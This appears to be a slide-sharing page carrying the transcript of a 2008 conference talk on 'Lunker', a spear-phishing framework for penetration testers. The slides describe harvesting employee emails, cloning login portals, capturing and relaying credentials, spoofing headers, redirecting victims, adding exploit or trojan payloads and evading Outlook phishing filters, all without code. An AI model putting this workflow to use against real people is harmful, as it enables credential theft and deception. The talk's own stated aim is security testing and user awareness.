Lunker: The Advanced Phishing Framework

Slides:

Advertisements

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Advertisements

Using the Self Service BMC Helpdesk

1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Security Management IACT 918 July 2004 Gene Awyzio SITACS University of Wollongong.

Security Management IACT 418/918 Autumn 2005 Gene Awyzio SITACS University of Wollongong.

Pro Exchange SPAM Filter An Exchange 2000 based spam filtering solution.

23 October 2002Emmanuel Ormancey1 Spam Filtering at CERN Emmanuel Ormancey - 23 October 2002.

Pizzlet Information System “When Spam just isn’t good enough…” Troy Lamberte Blake Norrish.

Outlook Web Access (OWA) is a web mail service of Microsoft Exchange; allow users to connect remotely via a Web browser OWA is used to access ,

Securing your IP based Phone System By Kevin Moroz VP Technology Snom Inc.

Website Hardening HUIT IT Security | Sep

SHASHANK MASHETTY security. Introduction Electronic mail most commonly referred to as or e- mail. Electronic mail is one of the most commonly.

Login Screen This is the Sign In page for the Dashboard Enter Id and Password to sign In New User Registration.

Presented By: Product Activation Group Syndication.

Leading at Every Turn. 1)Make sure you have your Trusted Sites configured properly in Internet Explorer 2)Store your credentials on your PC so you.

Review of Last Session Search Engine Optimisation (SEO) Search Engine Optimisation (SEO) You can fine-tune your site so that the search engines notice.

Hosted Exchange The purpose of this Startup Guide is to familiarize you with ExchangeDefender's Exchange and SharePoint Hosting. ExchangeDefender.

Drupal Security Securing your Configuration Justin C. Klein Keane University of Pennsylvania School of Arts and Sciences Information Security and Unix.

Classroom User Training June 29, 2005 Presented by:

Surveillance Equipment For Internet Activities It is a Internet activities surveillance equipment designed for sniffer package from networking, converter.

Login Screen This is the Sign In page for the Dashboard New User Registration Enter Id and Password to sign In.

Introduction to our On-Line Self Service Center at

WEB SPOOFING by Miguel and Ngan. Content Web Spoofing Demo What is Web Spoofing How the attack works Different types of web spoofing How to spot a spoofed.

14 Publishing a Web Site Section 14.1 Identify the technical needs of a Web server Evaluate Web hosts Compare and contrast internal and external Web hosting.

Identity Management Report By Jean Carreon and Marlon Gonzales.

Staying Safe Online Keep your Information Secure.

Tutorial Chapter 5. 2 Question 1: What are some information technology tools that can affect privacy? How are these tools used to commit computer crimes?

IST 210 Web Application Security. IST 210 Introduction Security is a process of authenticating users and controlling what a user can see or do.

3-Protecting Systems Dr. John P. Abraham Professor UTPA.

COMP3121 E-Commerce Technologies Richard Henson University of Worcester November 2011.

IT internet security. The Internet The Internet - a physical collection of many networks worldwide which is referred to in two ways: The internet (lowercase.

Phone: Mega AS Consulting Ltd © 2007  CAT – the problem & the solution  Using the CAT - Administrator  Mega.

Web Spoofing Steve Newell Mike Falcon Computer Security CIS 4360.

Training Guide for Inzalo SOP Users. This guide has been prepared to demonstrate the use of the Inzalo Intranet based SOP applications. The scope of this.

Tired of Spam? The solution is MailWasher

1 Fighting Comment Spam Employing the site’s audience, coding skills, and free distributed solutions to fight back.

Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.

Phishing Internet scams. Phishing phishing is an attempt to criminally and fraudulently acquire sensitive information, such as usernames, passwords and.

WEP Presentation for non-IT Steps and roles in software development 2. Skills developed in 1 st year 3. What can do a student in 1 st internship.

CIS 450 – Network Security Chapter 4 - Spoofing. Definition - To fool. In networking, the term is used to describe a variety of ways in which hardware.

Web Applications Testing By Jamie Rougvie Supported by.

What is risk online operation:  massive movement of operation to the internet has attracted hackers who try to interrupt such operation daily.  To unauthorized.

Vulnerability Scanning Vulnerability scanners are automated tools that scan hosts and networks for known vulnerabilities and weaknesses Credentialed vs.

Internet Safety and Productivity Tips Presented by ITS Kerri Sorenson and Sean Hernandez December 11, 8:30-9:00 am.

© Copyright 2009 SSLPost 01. © Copyright 2009 SSLPost 02 a recipient is sent an encrypted that contains data specific to that recipient the data.

Computer Security By Duncan Hall.

ASSIGNMENT 2 Salim Malakouti. Ticketing Website  User submits tickets  Admins answer tickets or take appropriate actions.

Chapter 6 Discovering the Scope of the Incident Spring Incident Response & Computer Forensics.

“Lines of Defense” against Malware.. Prevention: Keep Malware off your computer. Limit Damage: Stop Malware that gets onto your computer from doing any.

Advanced Guide to ing. Introduction In this guide you and explain will learn how to use ing in an advanced way. I will go through on.

Spoofing The False Digital Identity. What is Spoofing?  Spoofing is the action of making something look like something that it is not in order to gain.

SSH. 2 SSH – Secure Shell SSH is a cryptographic protocol – Implemented in software originally for remote login applications – One most popular software.

Copyright © SkyeyTech, Inc. CRMdesk Power and elegance.

For help or more information, please contact the P&W SRM team at ;

VP, Software Development

CSCE 548 Student Presentation Ryan Labrador

Web Application Penetration Testing ‘17

Internet Business Associate v2.0

Server Concepts Dr. Charles W. Kann.

Welcome to BELONG Tech Support Helpline Number Here we provide information and troubleshooting steps for. We have no involvement with any firms unless.

What is it? Why do I keep getting from Barracuda? SPAM.

Configuring Internet-related services

Lecture 2 - SQL Injection

Implementing Client Security on Windows 2000 and Windows XP Level 150

This is the Sign In page for the Dashboard

Cpanel for the CS Officer

Technical Integration Guide

Spear Phishing Awareness

Contract Management Software 100% Cloud-Based ContraxAware provides you with a deep set of easy to use contract management features.

Presentation transcript:

Lunker: The Advanced Phishing Framework Joshua Perrymon CEO, PacketFocus

Agenda Intro What is Lunker? What can it do? Attack Theory Payloads The Old Way Demo Questions

Who am I? Joshua Perrymon, CEO PacketFocus 12 yrs Experience “Ethical Hacking” Over 200 Spear-Phishing attacks in 4-5 languages 85% Success ratio using “Blacklist” emails from the Internet MUCH higher using “Whitelist” Emails

What is Phishing Phishing is a method of Social Engineering used to gain credentials, or have users perform a specific action. We have all gotten these types of emails. Sent out to Millions Usually triggers SPAM filtering alerts Uses a known phishing site that is usually takes down within a couple days if possible

What is Spear Phishing A directed Phishing Attack Only targets a handful of users Emails are harvested from the Internet or other public places Very hard to stop as the attack isn’t sent out all over the Internet

Attacking up the OSI We have been moving up the OSI (Open System Interconnection) model with attacks.

Attacking up the OSI model cont.

How these attacks work

Doing this the “OLD” Way This takes time. But doesn’t require a lot of technical skills. Find emails Find site to be phished Create the site Setup php mail spoof Test Send Monitor Before Lunker setting up a phishing attack required a lot more planning and technical details. You have to make a new phishing template by hand. Setup the backend scripts to capture the credentials, find a server to host it on, figure out how to relay a spookef email, login and either tail apache ot run TCPDUmp to monitor for attacks. This is now somewhat automated with the new framework.

Using the Phishing Framework Easy and repeatable Show step by step process on using lunker. Use camtasia or animations.

Step 1. PacketFocus.com 2008 - Jperrymon

Step 2: Enter Client Info PacketFocus.com 2008 - Jperrymon Step 2: Enter Client Info

PacketFocus.com 2008 - Jperrymon Client Details This is entered into the local database. This allows an audit trail of tests configuration and results. The idea is to document each step automatically, because no-one else wants to do it. Enter URL and IP Info if provided

Step3: Email Recon PacketFocus.com 2008 - Jperrymon

But everyone uses their company email address right???? PacketFocus.com 2008 - Jperrymon But everyone uses their company email address right???? This is hard to protect against most times. Usually, internal email addresses must be used in business communication. This can be leaked to the Internet Search Engines. Search “@acme.com” and look through the results.

Step 4: Phishing Analysis PacketFocus.com 2008 - Jperrymon

PacketFocus.com 2008 - Jperrymon On the lookout This module will actively search the target URL’s and IP’s in scope to identify potential Phishing Targets. Any site that requires credentials remotely should be considered and identified. Top targets include Webmail, VPN, and website logins. The tool will identify these portals and return analysis based on previous information gathered.

Step5: Select the Bait PacketFocus.com 2008 - Jperrymon

PacketFocus.com 2008 - Jperrymon Email is easy Most often, a simple email from spoofed technical support will be enough to have a user form over login and password details. Analysis will identify token passwords. Numeric entries should trigger token MITM functions. Start analysis timers.

PacketFocus.com 2008 - Jperrymon Verify it works

PacketFocus.com 2008 - Jperrymon Now what? Login to the Phishing site locally to make sure it captures the password. It’s easy to email the credentials. Be responsible and store them encrypted. Modules could auto login based on template used. Get email(), Get Attachment(), Get Keyword(), Get Subject().

PacketFocus.com 2008 - Jperrymon Redirect Confusion

PacketFocus.com 2008 - Jperrymon Where am I? Redirection must be used after the user logs in the first time. Error message, Google, etc Redirect to real site. Delete email sent to user after getting credentials.

Spoof the email PacketFocus.com 2008 - Jperrymon

Tony.. Tony Montana Setup a spoofed email. PacketFocus.com 2008 - Jperrymon Tony.. Tony Montana Setup a spoofed email. To goal is to have the user perform a pre-defined action. Authority, realism, and language play a vital role in a successful attacks. The key is gain trust as soon as possible. NLP (Neuro-Linguistical Programming) Milgram Experiment

Select Footer PacketFocus.com 2008 - Jperrymon

PacketFocus.com 2008 - Jperrymon Footer If you want to write a custom body, select a footer template to give the attack structure.

Scenario Options PacketFocus.com 2008 - Jperrymon

PacketFocus.com 2008 - Jperrymon Pick one. Pre-defined spoofed email scenarios are included with the framework. These are selected conversations that usually get the response desired based on actual field results. Scenarios: Tech Support Internal IT 3rd Party IT End-User

PacketFocus.com 2008 - Jperrymon Stealthy

Email Head Sometimes you need to modify the email headers. PacketFocus.com 2008 - Jperrymon Email Head Sometimes you need to modify the email headers. We will probably put something in here to identify the tool once it goes public.

Load the Ammo PacketFocus.com 2008 - Jperrymon

Money Shot. This is what makes the framework stand out. PacketFocus.com 2008 - Jperrymon Money Shot. This is what makes the framework stand out. The ability to add custom payloads to the phishing email. XSS, Browser Exploit, Recon, Trojans, Exploits, Backdoors, etc.. Welcome to hack 2.0

Test Environment PacketFocus.com 2008 - Jperrymon

PacketFocus.com 2008 - Jperrymon Test 1.2.3. This module launches the local email client and the locally hosted phishing site at the same time. The tester sends the spoofed email to a locally configured account. This account is checked by the Email Client as would a normal user. Look for mistakes. The smallest error can cause the attack not to work.

Local Mode

PacketFocus.com 2008 - Jperrymon Start the Audit

Just a little patience… PacketFocus.com 2008 - Jperrymon Just a little patience… Monitor the web server, db, MTA, and monitor. Setup MITM scripts to auto Configure alarms and real-time logic. Setup login options Capture Capture/Login Capture/Login/Scrape

DEMO Lets have a look at the current working version. How to bypass Outlook 2007 Phishing filters.

What's Next MITM- 2nd Factor Authentication Advanced Payloads PacketFocus.com 2008 - Jperrymon What's Next MITM- 2nd Factor Authentication Advanced Payloads XSS CRSF Browser Exploits Recon to determine user browser, OS, etc. Reporting  Forum Support Template Sharing Training Modules User reaction analysis module Ability to customize the Templates

Thank You Thanks for sitting through this presentation. The main aspect to take away from this is how attacks are moving up the OSI model and targeting the user (layer 8). It doesn’t take a lot of technical skills to perform these types of attacks. User Awareness is the only way to mitigate this risk. We can’t rely on technology.